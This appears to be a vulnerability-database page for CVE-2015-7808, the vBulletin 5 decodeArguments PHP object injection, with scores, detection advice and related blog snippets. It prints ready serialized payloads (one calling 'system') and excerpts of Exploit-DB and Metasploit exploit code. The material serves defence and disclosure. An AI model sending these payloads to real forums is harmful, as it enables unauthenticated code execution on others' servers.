CVE-2015-7808
published 2015-11-24CVE-2015-7808: The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute…
PriorityP279high7.5CVSS 2.0
AVNACLAuNCPIPAP
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
80.64%
99.6th percentile
The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/hook/decodeArguments.
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
Detection & IOCsextracted from sources · hover to see the quote
url/ajax/api/hook/decodeArguments?arguments=O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database":1:{s:9:"functions";a:1:{s:11:"free_result";s:6:"system";}}s:12:"%00*%00recordset";s:20:"echo%20$((0xfee10000))";}↗
urlhttp://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D↗
bytes↗
O:12:"vB_dB_Result":2:{s:5:"%00*%00db";O:11:"vB_Database"bytes↗
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D
- →Detect GET requests to the vBulletin endpoint /ajax/api/hook/decodeArguments with an 'arguments' parameter containing a PHP serialized object payload (starting with 'O:' or URL-encoded equivalent 'O%3A'). This is the sole attack vector for this CVE. ↗
- →The serialized payload specifically uses the class chain vB_dB_Result containing a nested vB_Database object with a 'functions' array mapping 'free_result' to an OS command function (e.g., 'system', 'phpinfo'). Alert on these class names in the arguments parameter. ↗
- →Canary/beacon detection: the exploit sends echo $((0xfee10000)) and checks for the response value 4276158464 to confirm code execution before issuing further commands. ↗
- →Two distinct gadget chains are used depending on vBulletin version: vB_Database for 5.0.X and vB_Database_MySQLi for 5.1.X. Monitor for both class names in the arguments parameter. ↗
- →The attack is unauthenticated (preauth). No session cookie or authentication token is required to exploit the endpoint. ↗
- ·Affected versions are strictly vBulletin 5 Connect 5.1.2 through 5.1.9 (and 5.0.X per Metasploit targeting). Versions outside this range are not confirmed vulnerable. ↗
- ·The exploit payload uses double-quote (0x22) as a bad character; URL-encoding of the serialized object is required for reliable delivery via the GET arguments parameter. ↗
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-rj4h-h9j2-p4h7: The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5
ghsa_unreviewed·2022-05-17
CVE-2015-7808 [HIGH] CWE-20 GHSA-rj4h-h9j2-p4h7: The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5
The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/hook/decodeArguments.
VulnCheck
vBulletin vBulletin Improper Input Validation
vulncheck·2015·CVSS 7.5
CVE-2015-7808 [HIGH] vBulletin vBulletin Improper Input Validation
vBulletin vBulletin Improper Input Validation
The vB_Api_Hook::decodeArguments method in vBulletin 5 Connect 5.1.2 through 5.1.9 allows remote attackers to conduct PHP object injection attacks and execute arbitrary PHP code via a crafted serialized object in the arguments parameter to ajax/api/hook/decodeArguments.
Affected: vBulletin vBulletin
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://unit42.paloaltonetworks.com/network-attack-trends-winter-2020/
Exploit PoC: https://vulncheck.com/xdb/3e4e7524deca
No detection rules found.
Exploit-DB
vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution (Metasploit)
exploitdb·2017-07-24
CVE-2015-7808 vBulletin 5.1.2 < 5.1.9 - Unserialize Code Execution (Metasploit)
vBulletin 5.1.2 'vBulletin 5.1.2 Unserialize Code Execution',
'Description' => %q{
This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9
},
'Platform' => 'php',
'License' => MSF_LICENSE,
'Author' => [
'Netanel Rubin', # reported by
'cutz', # original exploit
'Julien (jvoisin) Voisin', # metasploit module
],
'Payload' =>
{
'BadChars' => "\x22",
},
'References' =>
[
['CVE', '2015-7808'],
['EDB', '38629'],
['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],
['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
],
'Arch' => ARCH_PHP,
'Targets' => [
[ 'Automatic Targeting', { 'auto' => true } ],
['vBulletin 5.0.X', {'chain' => 'vB_Database'}],
['vBulletin 5.1.X', {'chain' => 'vB_Database_MySQLi'}
Exploit-DB
vBulletin 5.x - Remote Code Execution
exploitdb·2015-11-23
CVE-2015-7808 vBulletin 5.x - Remote Code Execution
vBulletin 5.x - Remote Code Execution
---
#[+] Title: Vbulletin 5.x - Remote Code Execution Exploit
#[+] Product: vbulletin
#[+] Vendor: http://vbulletin.com
#[+] Vulnerable Version(s): Vbulletin 5.x
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/reza.espargham
# Special Thanks : Mohammad Emad
system(($^O eq 'MSWin32') ? 'cls' : 'clear');
use LWP::UserAgent;
use LWP::Simple;
$ua = LWP::UserAgent ->new;
print "\n\t Enter Target [ Example:http://target.com/forum/ ]";
print "\n\n \t Enter Target : ";
$Target=;
chomp($Target);
$response=$ua->get($Target . '/ajax/api/hook/decodeArguments?
Exploit-DB
vBulletin 5.1.x - Remote Code Execution
exploitdb·2015-11-05
CVE-2015-7808 vBulletin 5.1.x - Remote Code Execution
vBulletin 5.1.x - Remote Code Execution
---
# Exploit Title: Vbulletin 5.1.X unserialize 0day preauth RCE exploit
# Date: Nov 4th, 2015
# Exploit Author: hhjj
# Vendor Homepage: http://www.vbulletin.com/
# Version: 5.1.x
# Tested on: Debian
# CVE :
# I did not discover this exploit, leaked from the IoT.
# Build the object
php functions['free_result'] = 'phpinfo';
}
}
class vB_dB_Result {
protected $db;
protected $recordset;
public function __construct()
{
$this->db = new vB_Database();
$this->recordset = 1;
}
}
print urlencode(serialize(new vB_dB_Result())) . "\n";
eof
O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00
Metasploit
vBulletin 5.1.2 Unserialize Code Execution
metasploit
vBulletin 5.1.2 Unserialize Code Execution
vBulletin 5.1.2 Unserialize Code Execution
This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
CVE-2020-28188 [HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
# Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020. Several newly observed exploits, including CVE-2020-28188, CVE-2020-17519, and CVE-2020-29227, have emerged and were continuously being exploited in the wild as of late 2020 to early 2021.
This blog provides details of the newly observed exploits as well as a dive deep into the exploitation analysis, vendor analysis, attack origin, and attack category distribution.
Palo Alto Networks Next-Generation Firewall customers are protected from these attacks with the URL Filtering an
Unit42
Network Attack Trends: Internet of Threats (November 2020-January 2021)
blogs_unit42·2021-04-12·CVSS 7.5
[HIGH] Network Attack Trends: Internet of Threats (November 2020-January 2021)
Threat Research Center
Trend Reports
Vulnerabilities
## Network Attack Trends: Internet of Threats (November 2020-January 2021)
Lei Xu
Yue Guan
Vaibhav Singhal
Published: April 12, 2021
Malware
Trend Reports
Vulnerabilities
Botnet
DDoS
Exploit kit
IoT
Network security trends
## Executive Summary
Unit 42 researchers analyzed network attack trends over Winter 2020 and discovered many interesting exploits in the wild. During the period of Nov. 2020 to Jan. 2021, the majority of the attacks we observed were classified as critical (75%), compared to the 50.4% we reported in the fall of 2020 . Several newly observed exploits, including CVE-2020-28188 , CVE-2020-17519 , and CVE-2020-29227 , have emerged and were continuously being exploited in the wild as of late 2020 to earl
Qualys
Hackers Are Having a Field Day with Stolen Credentials
blogs_qualys·2017-01-10
Hackers Are Having a Field Day with Stolen Credentials
Login credentials have always been a weak link in cybersecurity’s protection chain, a situation that’s worsening. However, this trend could be reversed with a bit of effort from end users, website owners and software vendors.
## 2016: The Year of Stolen Credentials
Hackers made hay of the sorry state of credential security in 2016. They stole millions of username and password combinations from online services of all shapes and sizes. Blogs and discussion forums were hit particularly hard.
Exploiting credentials is an old attack vector that still works wonders for hackers. In its 2016 Data Breach Investigations Report (DBIR), Verizon added a section about credentials, revealing that 63% of data breaches involved weak, default or stolen passwords.
“This statistic drives our recommendatio
Qualys
Hackers Are Having a Field Day with Stolen Credentials | Qualys
blogs_qualys·2017-01-10
Hackers Are Having a Field Day with Stolen Credentials | Qualys
Login credentials have always been a weak link in cybersecurity’s protection chain, a situation that’s worsening. However, this trend could be reversed with a bit of effort from end users, website owners and software vendors.
### 2016: The Year of Stolen Credentials
Hackers made hay of the sorry state of credential security in 2016. They stole millions of username and password combinations from online services of all shapes and sizes. Blogs and discussion forums were hit particularly hard.
Exploiting credentials is an old attack vector that still works wonders for hackers. In its 2016 Data Breach Investigations Report (DBIR), Verizon added a section about credentials, revealing that 63% of data breaches involved weak, default or stolen passwords.
“This statistic drives our recommendati
Greynoiseio
NoiseLetter April 2024
blogs_greynoiseio
NoiseLetter April 2024
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/http://packetstormsecurity.com/files/134331/vBulletin-5.1.2-Unserialize-Code-Execution.htmlhttp://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsqhttp://www.rapid7.com/db/modules/exploit/multi/http/vbulletin_unserializehttps://blog.sucuri.net/2015/11/vbulletin-exploits-in-the-wild.htmlhttps://www.exploit-db.com/exploits/38629/http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/http://packetstormsecurity.com/files/134331/vBulletin-5.1.2-Unserialize-Code-Execution.htmlhttp://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsqhttp://www.rapid7.com/db/modules/exploit/multi/http/vbulletin_unserializehttps://blog.sucuri.net/2015/11/vbulletin-exploits-in-the-wild.htmlhttps://www.exploit-db.com/exploits/38629/
2015-11-24
Published
Exploited in the wild